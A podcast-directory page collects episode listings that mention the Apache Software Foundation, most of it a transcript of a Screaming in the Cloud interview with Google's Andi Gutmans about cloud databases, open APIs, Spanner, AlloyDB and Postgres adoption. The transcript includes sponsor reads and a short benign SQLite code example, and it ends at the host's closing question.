Punit Bhatia is one of the leading privacy experts, working independently and with professionals in over 30 countries. Punit works with business and privacy leaders to create an organizational culture with high AI & privacy awareness and compliance as a business priority, by creating and implementing an AI & privacy strategy and policy.

Punit is the author of the books "Be Ready for GDPR" (rated as the best GDPR book), "AI & Privacy – How to Find Balance", "Intro To GDPR", and "Be an Effective DPO". Punit is a global speaker who has spoken at over 50 events, and he is the creator and host of the FIT4PRIVACY Podcast, which has been featured among the top GDPR and privacy podcasts.

As a person, Punit is an avid thinker and believes in thinking, believing, and acting in line with one's values to have joy in life. He has developed a philosophy named 'ABC for joy of life', which he passionately shares. Punit is based out of Belgium, the heart of Europe.

RESOURCES
Websites: www.fit4privacy.com, www.punitbhatia.com, www.privacera.com
Podcast: https://www.fit4privacy.com/podcast
Blog: https://www.fit4privacy.com/blog
YouTube: http://youtube.com/fit4privacy

--- Send in a voice message: https://podcasters.spotify.com/pod/show/fit4privacy/message

Dinis Guarda citiesabc openbusinesscouncil Thought Leadership Interviews
Chris J. Davis, CTO of Ingredient X and Co-Founder of Film.io

Dinis Guarda citiesabc openbusinesscouncil Thought Leadership Interviews

Play Episode Listen Later Nov 10, 2023 68:04


Chris J. Davis is a technologist and entrepreneur: YouTuber, designer, writer, producer & musician. Chris is the CTO and Co-Founder of Film.io, a decentralised entertainment ecosystem that is democratising the filmmaking and TV industries using DeFi and other blockchain technology. Film.io empowers fans with more influence in the creative process, creators with key access to resources, and investors with more meaningful data. He is also Co-Founder and CTO at Ingredient X, Inc.

Chris J. Davis Interview Questions
00:00 – 04:02 Introduction
04:03 – 09:12 Chris's background, inspirations and motivations
09:13 – 17:39 Working at the intersection of technology and art
17:40 – 25:30 Managing between the creative, software development, and business roles
25:31 – 37:59 Managing IP and digitalising film making
38:00 – 50:48 A user's journey through Film.io
50:49 – 01:05:13 How does Film.io build a sustainable community
01:05:14 – 01:08:04 Closure

Chris J. Davis Biography
Film.io transforms today's "Hollywood system" onto the blockchain, where fans, by participating before movies are made, have a voice in rating, reviewing and green-lighting the future of entertainment, developing an innovative metric that pre-validates the potential for a project's success for creators, studios, networks and investors with transparency and fairness.

Chris is a versatile professional with over two decades of experience in design and engineering. Starting his academic journey in Art, Media Communications, and English at Asbury University, he later explored Music at the University of Louisville. A pioneer in the early days of WordPress, Chris made significant contributions to its development, creating the first admin dashboard and theme system. His innovations extended beyond WordPress, making him an active member of the Infrastructure team for the Apache Software Foundation. Chris has also played a vital role in various startups, collaborating with tech figures like Janus Friis. Currently serving as the Chief Technology Officer of Ingredient X, he focuses on cutting-edge technologies such as blockchain, decentralised finance, and non-fungible tokens.

Learn more about Chris J. Davis on https://www.openbusinesscouncil.org/wiki/chris-j-davis
Learn more about Film.io on https://www.openbusinesscouncil.org/wiki/film-io

About Dinis Guarda profile and channels:
https://www.openbusinesscouncil.org
https://www.intelligenthq.com
https://www.hedgethink.com/
https://www.citiesabc.com/
https://openbusinesscouncil.org/wiki/dinis-guarda

More interviews and research videos on Dinis Guarda
Support the show

Add Dot
Made for the Cloud: Cell-based Architecture, Ballerina Language, and Choreo Platform

Add Dot

Play Episode Listen Later Aug 28, 2023 70:30


Vaughn and Asanka, WSO2's CTO, discuss a relatively radical and fresh approach to cloud application and services development. The tools include the domain-driven Cell-based Architecture, the Ballerina programming language, and the Choreo cloud platform. This purpose-built trio is composed as one powerful offering to give software engineers the ability to focus their efforts on delivering cloud-native applications and services. Of course, engineers are not required to use the Ballerina programming language; they may use Java or any other language of their choice. Yet, for those looking for a practical approach to functional programming that offers asynchronicity and handles service integrations well, Ballerina is a language worth trying. Together, this architecture-language-platform trio deserves consideration for use in your future enterprise.

Asanka Abeysinghe, WSO2's CTO, is a technology visionary with over 20 years of experience designing and implementing scalable distributed systems, microservices, and business integration solutions. He advances WSO2's corporate reference architecture, collaborates with customers and industry analysts, and drives the company's technology mission. Asanka is also a contributor to the Apache Software Foundation and a sought-after speaker at global events.

Hosted on Acast. See acast.com/privacy for more information.

Startup Project
#60 Tim Chen - From Open Source Contributor to Investor in Infrastructure Startups

Startup Project

Play Episode Listen Later Jul 2, 2023 63:42


Tim Chen is the Managing Partner at Essence VC, an early-stage fund focused on data infrastructure and developer tool companies. He has over a decade of experience leading engineering in enterprise infrastructure and open source communities and companies. Prior to Essence, Tim was the SVP of Engineering at Cosmos, a popular open source blockchain SDK. Before Cosmos, Tim co-founded Hyperpilot with Stanford Professor Christos Kozyrakis, leveraging decades of research to disrupt the enterprise infrastructure space; Hyperpilot later exited to Cloudera. Before Hyperpilot, Tim was an early employee at Mesosphere and Cloud Foundry. He is also active in the open source space as an Apache Software Foundation core member, a maintainer of Apache Drill and Apache Mesos, and a CNCF TOC contributor. --- Send in a voice message: https://podcasters.spotify.com/pod/show/startupproject/message

To The Point - Cybersecurity
Keep People At The Center of it All with Mishi Choudhary Part 2

To The Point - Cybersecurity

Play Episode Listen Later Mar 14, 2023 34:25


Joining the podcast this week is Mishi Choudhary, SVP and General Counsel at Virtru. Mishi shares with us some legal perspective on the privacy discussion, including freedom of thought, the right to be forgotten, end-to-end encryption for protecting user data, finding a middle ground between meeting customer privacy demands and complying with legal requirements, getting to a federal privacy regulation, and so much more! You won't want to miss what is a truly spirited and candid conversation – in two parts!

Mishi Choudhary, SVP and General Counsel, Virtru
A technology lawyer with over 17 years of legal experience, Mishi has served as a legal representative for many of the world's most prominent free and open source software developers and distributors, including the Free Software Foundation, Cloud Native Computing Foundation, Linux Foundation, Debian, the Apache Software Foundation, and OpenSSL. At Virtru, she leads all legal and compliance activities, builds internal processes to continue to accelerate growth, helps shape Virtru and open source strategy, and activates global business development efforts.

For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e224

To The Point - Cybersecurity
Privacy: Keep People At The Center of it All with Mishi Choudhary

To The Point - Cybersecurity

Play Episode Listen Later Mar 7, 2023 23:37


Joining the podcast this week is Mishi Choudhary, SVP and General Counsel at Virtru. Mishi shares with us some legal perspective on the privacy discussion, including freedom of thought, the right to be forgotten, end-to-end encryption for protecting user data, finding a middle ground between meeting customer privacy demands and complying with legal requirements, getting to a federal privacy regulation, and so much more! You won't want to miss what is a truly spirited and candid conversation – in two parts!

Mishi Choudhary, SVP and General Counsel, Virtru
A technology lawyer with over 17 years of legal experience, Mishi has served as a legal representative for many of the world's most prominent free and open source software developers and distributors, including the Free Software Foundation, Cloud Native Computing Foundation, Linux Foundation, Debian, the Apache Software Foundation, and OpenSSL. At Virtru, she leads all legal and compliance activities, builds internal processes to continue to accelerate growth, helps shape Virtru and open source strategy, and activates global business development efforts.

For links and resources discussed in this episode, please visit our show notes at https://www.forcepoint.com/govpodcast/e223

Buongiorno da Edo
Native Americans vs. Apache, then new Intel Xeons, then State of JS 2022

Buongiorno da Edo

Play Episode Listen Later Jan 13, 2023 7:52


Indigenous tech group asks Apache Foundation to change its name - https://arstechnica.com/gadgets/2023/01/indigenous-tech-group-asks-apache-foundation-to-change-its-name/
Native Americans urge Apache Software Foundation to ditch its name - https://www.theregister.com/2023/01/11/native_american_apache_software_foundation/
Intel Launches 4th Gen Xeon Scalable "Sapphire Rapids", Xeon CPU Max Series - https://www.phoronix.com/review/intel-xeon-sapphire-rapids-max
Intel Xeon Platinum 8490H "Sapphire Rapids" Performance Benchmarks - https://www.phoronix.com/review/intel-xeon-platinum-8490h
After big delays, Sapphire Rapids arrives, full of accelerators and superlatives - https://www.theregister.com/2023/01/10/after_big_delays_intels_new/
Inside Intel's Delays in Delivering a Crucial New Microprocessor - https://www.nytimes.com/2023/01/10/technology/intel-sapphire-rapids-microprocessor.html
The State of JS 2022 - https://2022.stateofjs.com/en-US/

#apache #nativeamericans #intel #xeon #sapphirerapids #stateofjs #stateofjs2022

=== RSS - https://anchor.fm/s/b1bf48a0/podcast/rss --- Send in a voice message: https://podcasters.spotify.com/pod/show/edodusi/message

Der Data Analytics Podcast
Apache Software Foundation

Der Data Analytics Podcast

Play Episode Listen Later Dec 11, 2022 3:33


What does the Apache Software Foundation do? A brief overview and where it fits within the data engineering infrastructure.

Screaming in the Cloud
The Art and Science of Database Innovation with Andi Gutmans

Screaming in the Cloud

Play Episode Listen Later Nov 23, 2022 37:07


About Andi
Andi Gutmans is the General Manager and Vice President for Databases at Google. Andi's focus is on building, managing, and scaling the most innovative database services to deliver the industry's leading data platform for businesses. Before joining Google, Andi was VP Analytics at AWS, running services such as Amazon Redshift. Before his tenure at AWS, Andi served as CEO and co-founder of Zend Technologies, the commercial backer of open-source PHP.

Andi has over 20 years of experience as an open source contributor and leader. He co-authored open source PHP. He is an emeritus member of the Apache Software Foundation and served on the Eclipse Foundation's board of directors. He holds a bachelor's degree in Computer Science from the Technion, Israel Institute of Technology.

Links Referenced:
LinkedIn: https://www.linkedin.com/in/andigutmans/
Twitter: https://twitter.com/andigutmans

Transcript

Announcer: Hello, and welcome to Screaming in the Cloud with your host, Chief Cloud Economist at The Duckbill Group, Corey Quinn. This weekly show features conversations with people doing interesting work in the world of cloud, thoughtful commentary on the state of the technical world, and ridiculous titles for which Corey refuses to apologize. This is Screaming in the Cloud.

Corey: This episode is sponsored in part by our friends at Sysdig. Sysdig secures your cloud from source to run. They believe, as do I, that DevOps and security are inextricably linked. If you wanna learn more about how they view this, check out their blog; it's definitely worth the read. To learn more about how they are absolutely getting it right from where I sit, visit Sysdig.com and tell them that I sent you. That's S Y S D I G.com. And my thanks to them for their continued support of this ridiculous nonsense.

Corey: Welcome to Screaming in the Cloud. I'm Corey Quinn. This promoted episode is brought to us by our friends at Google Cloud, and in so doing, they have gotten a guest to appear on this show that I have been low-key trying to get here for a number of years. Andi Gutmans is VP and GM of Databases at Google Cloud. Andi, thank you for joining me.

Andi: Corey, thanks so much for having me.

Corey: I have to begin with the obvious. Given that one of my personal passion projects is misusing every cloud service I possibly can as a database, where do you start and where do you stop as far as saying, "Yes, that's a database, so it rolls up to me," and, "No, that's not a database, so someone else can deal with the nonsense"?

Andi: I'm in charge of the operational databases, so that includes both the managed third-party databases, such as MySQL, Postgres, and SQL Server, and the cloud-first databases, such as Spanner, Bigtable, Firestore, and AlloyDB. So, I suggest that's where you start, because those are all awesome services. What doesn't fall underneath that purview are things like BigQuery, which is an analytics data warehouse, and other analytics engines. And of course, there are always folks who bring in their favorite, maybe lesser-known or less popular, database and self-manage it on GCE, on Compute.

Corey: Before you wound up at Google Cloud, you spent roughly four years at AWS as VP of Analytics, which is, again, one of those very hazy types of things. Where does it start? Where does it stop? It's not at all clear from the outside.
But even before that, you were, I guess, something of a legendary figure, which I know is always a weird thing for people to hear. You were partially responsible, at least, for the Zend Framework in the PHP world, which I didn't realize what the heck that was, despite supporting it in production at a couple of jobs, until after I, for better or worse, was no longer trusted to support production environments anymore. Which, honestly, if you can get out, I'm a big proponent of doing that. You sleep so much better without a pager. How did you go from programming languages all the way on over to databases? It just seems like a very odd mix.

Andi: Yeah. No, that's a great question. So, I was one of the core developers of PHP, and, you know, I had been in the PHP community for quite some time. I also helped ideate the Zend Framework. And Zend Technologies, the company that I co-founded, was kind of the company behind PHP. So, like Red Hat supports Linux commercially, we supported PHP. And I was very much focused on developers, programming languages, frameworks, IDEs, and that was, you know, really exciting. I had also done quite a bit of work on interoperability with databases, right, because behind every application there's a database, and so a lot of what we focused on was great connectivity to MySQL, to Postgres, to other databases. And I got to learn the database world from the outside, from the application builders. We sold our company in, I think it was, 2015, and so I had to figure out what's next. One option would have been, hey, stay in programming languages. But what I learned over the many years that I worked with application developers is that there's a huge amount of value in data. And frankly, I'm a very curious person; I always like to learn. So, there was this opportunity to join Amazon, to join the non-relational database side, and take myself completely out of my comfort zone. And actually, I joined AWS to help build the graph database Amazon Neptune, which was even further out of my comfort zone than probably even a relational database. So, I kind of like to do different things, and so I joined, and I had to learn, you know, how to build a database pretty much from the ground up. I mean, of course, I didn't do the coding, but I had to learn enough to be dangerous, and so I worked on a bunch of non-relational databases there, such as Neptune, Redis, Elasticsearch, DynamoDB Accelerator. And then there was the opportunity for me to actually move over from non-relational databases to analytics, which was another way to get out of my comfort zone. And so, I moved to run the analytics space, which included services like Redshift, like EMR, Athena, you name it. So, that was just a great experience for me, where I got to work with a lot of awesome people and learn a lot. And then the opportunity arose to join Google and actually run the Google transactional databases, including their older relational databases. And by the way, my job is actually two jobs. One job is running Spanner and Bigtable for Google itself, meaning, you know, search, ads, YouTube, and everything run on these databases. And the second job is actually running external-facing databases for external customers.
Corey: How alike are those two? Is it effectively the exact same thing, just with different API endpoints? Are they two completely separate universes? It's always unclear from the outside when looking at large companies that effectively eat versions of their own dog food, where their internal usage of these things starts and stops.

Andi: So, great question. So, Cloud Spanner and Cloud Bigtable do actually use the internal Spanner and Bigtable. At the core, it's exactly the same engine, the same runtime, the same storage, and everything. However, internally, the way we built the database APIs was kind of good for scrappy, you know, Google engineers, folks who are okay learning how to fit into the Google ecosystem. But when we needed to make this work for enterprise customers, we needed cleaner APIs, we needed authentication that was external, right, and so on and so forth. So, think of it as: we had to add an additional set of APIs on top of it, and management, right, to really make these engines accessible to the external world. So, it's running the same engine under the hood, but it is a different set of APIs, and a big part of our focus is continuing to expose to enterprise customers all the goodness that we have in the internal system. It's really about taking these very, very unique, differentiated databases and democratizing access to them for anyone who wants it.

Corey: I'm curious to get your position on what seems to be, I guess, a battle that's been playing itself out in a number of different customer conversations. And that is the theoretical decision between: do we go towards general-purpose databases and more or less treat every problem as a nail in search of a hammer, or do we decide that every workload gets its own custom database that aligns best with that particular workload? There are trade-offs in either direction, but I'm curious where you land on that, given that you tend to see a lot more of it than I do.
Andi: No, that's a great question. And, you know, just for the viewers who maybe aren't aware, there are kind of two extreme points of view, right? There's one point of view that says purpose-built for everything: for every specific pattern, build bespoke databases; it's kind of a best-of-breed approach. The problem with that approach is it becomes extremely complex for customers, right? Extremely complex to decide what to use, and they might need to use multiple for the same application, so that can be a bit daunting as a customer. And frankly, there's a law of diminishing returns at some point.

Corey: Absolutely. I don't know what the DBA role of the future is, but I don't think anyone really wants it to be, "Oh, yeah. We're deciding which one of these three dozen managed database services is the exact right fit for each and every individual workload." I mean, at some point it feels like certain cloud providers believe that not only should every workload have its own database, but almost every workload should have its own database service. At some point, you're allowed to say no and stop building these completely, what feel to me like, Byzantine, esoteric database engines that don't seem to have broad applicability to a whole lot of problems.

Andi: Exactly, exactly. And maybe the other extreme is what folks often talk about as multi-model, where you say, "Hey, I'm going to have a single storage engine and then map onto that the relational model, the document model, the graph model, and so on." I think what we tend to see is, if you go too generic, you also start having performance issues, and you may not be getting the right capabilities and trade-offs around consistency, replication, and so on. So, I would say Google is taking a very pragmatic approach, where we're saying, "You know what? We're not going to solve all of our customers' problems with a single database, but we're also not going to have two dozen." We're basically saying, "Hey, let's understand the main characteristics of the workloads our customers need to address, and build the best services around those." Obviously, over time, we continue to enhance what we have to fit additional models. And then, frankly, we have a really awesome partner ecosystem on Google Cloud, where, if someone really wants a very specialized database, we also have great partners they can use on Google Cloud and get great support and the rest of the benefits of the platform.

Corey: I'm very curious to get your take on a pattern that I've seen alluded to by basically every vendor out there, except the couple of very obvious ones for whom it does not serve their particular vested interests, which is that there's a recurring narrative that customers are demanding open-source databases for their workloads. And when you hear that, at least people who came up the way that I did, spending entirely too much time on Freenode, back when that was not a deeply problematic statement in and of itself, think: yes, we're open-source, I guess, zealots is probably the best terminology, and yeah, businesses are demanding to participate in the open-source ecosystem. Here in reality, what I see is not ideological purity or anything like that and much more to do with, "Yeah, we don't like having a single commercial vendor for our databases that basically plays the insert-quarter-to-continue dance whenever we're trying to do something new. We want the ability to not have licensing constraints around when, where, how, and how quickly we can run databases." That's what I hear when customers are actually talking about open-source versus proprietary databases. Is that what you see, or do you think that plays out differently? Because, let's be clear, you do have a number of database services that you offer that are not open-source but are also absolutely not tied to weird licensing restrictions either.

Andi: That's a great question, and I think, for years now, customers have been in a difficult spot, because the legacy proprietary database vendors knew how sticky the database is, and so, as a result, the prices often went up, and it was not easy for customers to manage costs and agility and so on. But I would say that's always been somewhat of a concern. What I'm seeing changing and happening differently now is this: as customers are moving into the cloud, and they want to run hybrid cloud, they want to run multi-cloud, and they need to prove to their regulator that they can do a stressed exit, open source is not just about reducing cost. It's really about flexibility and being in control of when and where you can run the workloads.
So, I think what we're really seeing now is a significant surge of customers who are trying to get off legacy proprietary databases and move to open APIs, right, because they need that freedom. And that freedom is far more important to them than even the cost element. What's really interesting is that a lot of these are the decision-makers in these enterprises, not just the technical folks. To your point, it's not just open-source advocates, right? It's really the business people, who understand they need the flexibility. And, by the way, even the regulators are asking them to show that they can flexibly move their workloads as they need to. So, we're seeing a huge interest there, and, as you said, some of our services are open-source-based services and some of them are not. Take Spanner as an example: it is heavily tied to how we build our infrastructure and how we build our systems. I would say it's almost impossible to open-source Spanner. But what we've done is we've embraced open APIs and made sure that if a customer uses these systems, we're giving them control of when and where they want to run their workloads. So, for example, Bigtable has an HBase API; Spanner now has a Postgres interface. Our goal is really to give customers as much flexibility as possible and not lock them into Google Cloud. We want them to be able to move out of Google Cloud so they have control of their destiny.
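To make the Postgres-interface point concrete, here is a minimal sketch of connecting to a Spanner PostgreSQL-dialect database with a stock Postgres driver, assuming Google's PGAdapter proxy is running locally on its default port; the database name and query are placeholders:

import psycopg2

# A standard PostgreSQL driver, pointed at PGAdapter instead of a Postgres server.
conn = psycopg2.connect(
    host="localhost",       # assumed local PGAdapter proxy
    port=5432,
    database="example-db",  # placeholder Spanner database
)

with conn, conn.cursor() as cur:
    # Plain SQL; the same statement would run unchanged against vanilla Postgres,
    # which is the portability being described here.
    cur.execute("SELECT singer_id, full_name FROM singers ORDER BY full_name")
    for singer_id, full_name in cur.fetchall():
        print(singer_id, full_name)

conn.close()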
That said, not every application necessarily needs it. And you still have that option, right, that if you need to, or want to, or we're not giving you a reasonable price or reasonable price performance, or we're starting to neglect you as a customer—which of course we wouldn't, but let's just say hypothetically, you know, that could happen—you still have a way to basically go and run this elsewhere. Now, I'd also want to talk about some of the upsides something like Spanner gives you. Because you talked about how you want to be able to just grab a few things, build something quickly, and then, you know, you don't want to be stuck.

The counterpoint to that is with Spanner, you can start really, really small, and then let's say you're a gaming studio, you know, you're building ten titles hoping that one of them is going to take off. So, you can build ten of those, you know, with very minimal spend on Spanner, and if one takes off overnight, it's really only the database where you don't have to go and re-architect the application; it's going to scale as big as you need it to. And so, it does enable a lot of this innovation and a lot of cost management as you try to get to that overnight success.

Corey: Yeah, overnight success. I always love that approach. It's one of those, “Yeah, I became an overnight success after only ten short years.” It becomes this idea people believe happens in fits and starts, but then you see, I guess, on some level, the other side of it, where it's a lot of showing up and doing the work. I have to confess, I didn't do a whole lot of admin work in my production years that touched databases because I have an aura and I'm unlucky, and it turns out that when you blow away some web servers, everyone can laugh and we'll reprovision stateless things.

Get too close to the data warehouse, for example, and you don't really have a company left anymore. And of course, in the world of finance that I came out of, transactional integrity is also very much a thing. A question that I had [centers 00:17:51] really around one of the predictions you gave recently at Google Cloud Next, which is your prediction for the future is that transactional and analytical workloads from a database perspective will converge. What's that based on?

Andi: You know, I think we're really moving to a world where customers are trying to make real-time decisions, right? If there's model drift from an AI and ML perspective, they want to be able to retrain their models as quickly as possible. So, everything is fast moving into streaming. And I think what you're starting to see is, you know, customers don't have that time to wait for analyzing their transactional data. Like in the past, you'd do a batch job, you know, once a day or once an hour, you know, to move the data from your transactional system to the analytical system, but that's just not how always-on businesses run anymore, and they want to have those real-time insights.

So, I do think that what you're going to see is transactional systems more and more building analytical capabilities, analytical systems building in more transactional ones, and then ultimately, cloud platform providers like us helping fill that gap and really making data movement seamless across transactional, analytical, and even AI and ML workloads. And so, that's an area that I think is a big opportunity. I also think that Google is best positioned to solve that problem.

Corey: Forget everything you know about SSH and try Tailscale.
Imagine if you didn't need to manage PKI or rotate SSH keys every time someone leaves. That'd be pretty sweet, wouldn't it? With Tailscale SSH, you can do exactly that. Tailscale gives each server and user device a node key to connect to its VPN, and it uses the same node key to authorize and authenticate SSH.

Basically you're SSHing the same way you manage access to your app. What's the benefit here? Built-in key rotation, permissions as code, connectivity between any two devices, reduced latency, and there's a lot more, but there's a time limit here. You can also ask users to reauthenticate for that extra bit of security. Sounds expensive? Nope, I wish it were. Tailscale is completely free for personal use on up to 20 devices. To learn more, visit snark.cloud/tailscale. Again, that's snark.cloud/tailscale.

Corey: On some level, I've found that, at least in my own work, once I wind up using a database for something, I'm inclined to try and stuff as many other things into that database as I possibly can, just because getting a whole second data store, taking a dependency on it for any given workload, tends to be a little bit on the, I guess, challenging side. Easy example of this. I've talked about it previously in various places, but I was talking to one of your colleagues, [Sarah Ellis 00:19:48], who wound up at one point making a joke that I, of course, took way too far. Long story short, I built a Twitter bot on top of Google Cloud Functions that, every time the Azure brand account tweets, simply posts a quote-tweet that translates their tweet into all caps, and then puts a boomer-style statement in front of it if there's room. This account is @cloudboomer.

Now, the hard part that I had while doing this is everything stateless works super well. Where do I wind up storing the ID of the last tweet that it saw on its previous run? And I was fourth and inches from just saying, “Well, I'm already using Twitter so why don't we use Twitter as a database?” Because everything's a database if you're either good enough or bad enough at programming. And instead, I decided, okay, we'll try this Firebase thing first.

And I don't know if it's Firestore, or Datastore, or whatever it's called these days, but once I wrapped my head around it, it was incredibly effective, very fast to get up and running, and I feel like I made at least a good decision, for once in my life, involving something touching databases. But it's hard. I feel like I'm consistently drawn toward the thing I'm already using as a default database. I can't shake the feeling that that's the wrong direction.

Andi: I don't think it's necessarily wrong. I mean, I think, you know, with Firebase and Firestore, that combination just makes it extremely easy and quick to build awesome mobile applications. And actually, you can build mobile applications without a middle tier, which is probably what attracted you to that. So, we just see, you know, a huge amount of developers and applications. We have over 4 million databases in Firestore, with just developers building these applications, especially mobile-first applications. So, I think, you know, if you can get your job done and get it done effectively, absolutely stick with them.

And by the way, one thing a lot of people don't know about Firestore is it's actually running on Spanner infrastructure, so Firestore has the same five-nines availability, no maintenance downtime, and so on, that Spanner has, and the same kind of ability to scale.
So, it's not just that it's quick, it will actually scale as much as you need it to and be as available as you need it to. So, that's on that piece. I think, though, to the same point, you know, there's other databases that we're trying to make sure also extend their usage beyond what they've traditionally done. So, you know, for example, we announced AlloyDB, which I kind of call Postgres on steroids: we added analytical capabilities to this transactional database so that as customers do have more data in their transactional database, as opposed to having to go somewhere else to analyze it, they can actually do real-time analytics within that same database, and it can actually do up to 100 times faster analytics than open-source Postgres.

So, I would say both Firestore and AlloyDB are kind of good examples of: if it works for you, right, we'll also continue to make investments so the amount of use cases you can use these databases for continues to expand over time.

Corey: One of the weird things that I noticed just looking around this entire ecosystem of databases—and you've been in this space long enough to, presumably, have seen the same type of evolution—back when I was transiting between different companies a fair bit, sometimes because I was consulting and other times because I'm one of the greatest in the world at getting myself fired from jobs based upon my personality, I found that the default standard was always, “Oh, whatever the database is going to be, it started off as MySQL and then eventually pivots into something else when that starts falling down.” These days, I can't shake the feeling that almost everywhere I look, Postgres is the answer instead. What changed? What did I miss in the ecosystem that's driving that renaissance, for lack of a better term?

Andi: That's a great question. And, you know, I have been involved in—I'm going to date myself a bit—but in PHP since 1997, pretty much, and one of the things we kind of did is we built a really good connector to MySQL—and you know, I don't know if you remember, before MySQL, there was mSQL, and the MySQL API actually came from mSQL—and we bundled the MySQL driver with PHP. And so, kind of that LAMP stack really took off. And kind of to your point, you know, the default on the web, right, was like, you're going to start with MySQL because it was super easy to use, just fun to use.

By the way, I actually wrote—co-authored—the tab completion in the MySQL client. So like, a lot of these kinds of, you know, fun, simple ways of using MySQL were there, and frankly, it was super fast, right? And so, kind of those fast reads and everything, it just was great for web and for content. And at the time, Postgres kind of came across more like a science project. Like, the folks who were using Postgres were kind of the outliers, right, you know, the less pragmatic folks.

I think what's changed over the past (how many years has it been now, 25 years? I'm definitely dating myself) is a few things: one, MySQL is still awesome, but it didn't kind of go in the direction of really, kind of, trying to catch up with the legacy proprietary databases on features and functions. Part of that may just be that from a roadmap perspective, that's not where the owner wanted it to go. So, MySQL today is still great, but it didn't go into that direction. In parallel, right, customers wanted to move more to open-source.
And so, what they found is the thing that actually looks and smells more like the legacy proprietary databases is actually Postgres, plus you saw an increase of investment in the Postgres ecosystem, which also has a very liberal license.

So, you have lots of other databases, including commercial ones, that have been built off the Postgres core. And so, I think you are today in a place where, for mainstream enterprise, Postgres is it, because that is the thing that has all the features that the enterprise customer is used to. MySQL is still very popular, especially in, like, content and web, and mobile applications, but I would say that Postgres has really become kind of that de facto standard API that's replacing the legacy proprietary databases.

Corey: I've been on the record way too much as saying, with some justification, that the best database in the world that should be used for everything is Route 53, specifically, TXT records. It's a key-value store, and then anyone who's deep enough into DNS or databases generally gets a slightly greenish tinge and feels ill. That is my simultaneous best and worst database. I'm curious as to what your most controversial opinion is about the worst database in the world that you've ever seen.

Andi: This is the worst database? Or—

Corey: Yeah. What is the worst database that you've ever seen? I know, at some level, since you manage all things database, I'm asking you to pick your least favorite child, but here we are.

Andi: Oh, that's a really good question. No, I would say probably the “worst database,” double quotes, is just the file system, right? When folks are basically using the file system as a regular database. And that can work for, you know, really simple apps, but as apps get more complicated, that's not going to work. So, I've definitely seen some of that.

I would say the most awesome database that is also file-system-based, kind of embedded, I think was actually SQLite, you know? And SQLite is actually still very, very popular. I think it sits on pretty much every mobile device on the planet. So, I actually think it's awesome, but it's, you know, it's not a database server. It's kind of an embedded database, but it's something that I, you know, I've always been pretty excited about. And, you know, there are [unintelligible 00:27:43] kind of new, interesting databases emerging that are also embedded, like DuckDB, which is quite interesting. You know, it's kind of the SQLite for analytics.

Corey: We've been using it for a few things around bill analysis ourselves. It's impressive. I've also got to say, people think that we had something to do with it because we're The Duckbill Group, and it's DuckDB. “Have you done anything with this?” And the answer is always, “Would you trust me with a database? I didn't think so.” So no, it's just a weird coincidence. But I liked that a lot.

It's also counterintuitive from where I sit because I'm old enough to remember when Microsoft was teasing the idea of WinFS, where they teased a future file system that fundamentally was a database—I believe it was an index or journal for all of that—and I don't believe anything ever came of it. But ugh, that felt like a really weird alternate world we could have lived in.

Andi: Yeah. Well, that's a good point. And by the way, you know, if I actually take a step back, right: I kind of half-jokingly said, you know, file system, and obviously, you know, all the popular databases persist on the file system.
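(An editorial aside: the embedded, file-backed model Andi praises in SQLite is easy to see in code. Below is a minimal sketch, assuming the widely used Xerial sqlite-jdbc driver is on the classpath; the file name, table, and key are made up for illustration.)

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;

public class SqliteSketch {
    public static void main(String[] args) throws Exception {
        // No server process: the whole "database" is a single local file.
        try (Connection conn = DriverManager.getConnection("jdbc:sqlite:example.db");
             Statement stmt = conn.createStatement()) {
            stmt.execute("CREATE TABLE IF NOT EXISTS kv (k TEXT PRIMARY KEY, v TEXT)");
            stmt.execute("INSERT OR REPLACE INTO kv VALUES ('last_tweet_id', '12345')");
            try (ResultSet rs = stmt.executeQuery("SELECT v FROM kv WHERE k = 'last_tweet_id'")) {
                while (rs.next()) {
                    System.out.println(rs.getString("v")); // prints 12345
                }
            }
        }
    }
}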
But if you look at what's different in cloud-first databases, right, like, if you look at legacy proprietary databases, the typical setup is write to the local disk and then do asynchronous replication with some kind of bounded replication lag to somewhere else, to a different region, or so on. If you actually start to look at what the cloud-first databases look like, they actually write the data in multiple data centers at the same time.

And so, kind of joke aside, as you start to think about, “Hey, how do I build the next generation of applications and how do I really make sure I get the resiliency and the durability that the cloud can offer,” it really does take a new architecture. And so, that's where things like, you know, Spanner and Bigtable and, kind of, AlloyDB are truly architected for the cloud. That's where they actually think very differently about durability and replication, and what it really takes to provide the highest level of availability and durability.

Corey: On some level, I think one of the key things for me to realize was that in my own experiments, whenever I wind up doing something that is either for fun or I just want to see how it works and what's possible, the scale of what I'm building is always inherently a toy problem. It's like the old line that if it fits in RAM, you don't have a big data problem. And then I'm looking at things these days that have most of a petabyte's worth of RAM, so okay, that definition continues to extend and get ridiculous. But I still find that most of what I do in a database context can be done with almost any database. There's no reason for me not to, for example, use a SQLite file or an object store (there's a little latency, but whatever) or even a text file on disk.

The challenge I find is that as you start scaling and growing these things, you start to run into limitations left and right, and only then it's one of those, oh, I should have made different choices or I should have built in abstractions. But so many of these things come to nothing; it just feels like extra work. What guidance do you have for people who are trying to figure out how much effort to put in upfront when they're just more or less puttering around to see what comes out of it?

Andi: You know, we like to think about ourselves at Google Cloud as really having a unique value proposition that really helps you future-proof your development. You know, if I look at both Spanner and I look at BigQuery, you can actually start with a very, very low cost. And frankly, not every application has to scale. So, you can start at low cost, you can have a small application, but everyone wants two things: one is availability, because you don't want your application to be down, and number two is, if you have to scale, you want to be able to without having to rewrite your application. And so, I think this is where we have a very unique value proposition, both in how we built Spanner and then also how we built BigQuery: you can actually start small, and for example, on Spanner, you can go from one-tenth of what we call an instance (like, a small instance that is, you know, under $65 a month) to a petabyte-scale OLTP environment with thousands of instances in Spanner, with zero downtime.

And so, I think that is really the unique value proposition.
We're basically saying you can hold the stick at both ends: you can basically start small, and then if that application does need to scale, does need to grow, you're not reengineering your application and you're not taking any downtime for reprovisioning. So, I think that's—if I had to give folks, kind of, advice, I'd say, “Look, what's done is done. You have workloads on MySQL, Postgres, and so on. That's great.”

Like, they're awesome databases, keep on using them. But if you're truly building a new app, and you're hoping that app is going to be successful at some point (and, like you said, all overnight successes take at least ten years), then if you at least build it on something like Spanner, you don't actually have to think about that anymore or worry about it, right? It will scale when you need it to scale and you're not going to have to take any downtime for it to scale. So, that's how we see a lot of these industries that have these potential spikes, like gaming, retail, also some use cases in financial services: they basically gravitate towards these databases.

Corey: I really want to thank you for taking so much time out of your day to talk with me about databases and your perspective on them, especially given my profound level of ignorance around so many of them. If people want to learn more about how you view these things, where's the best place to find you?

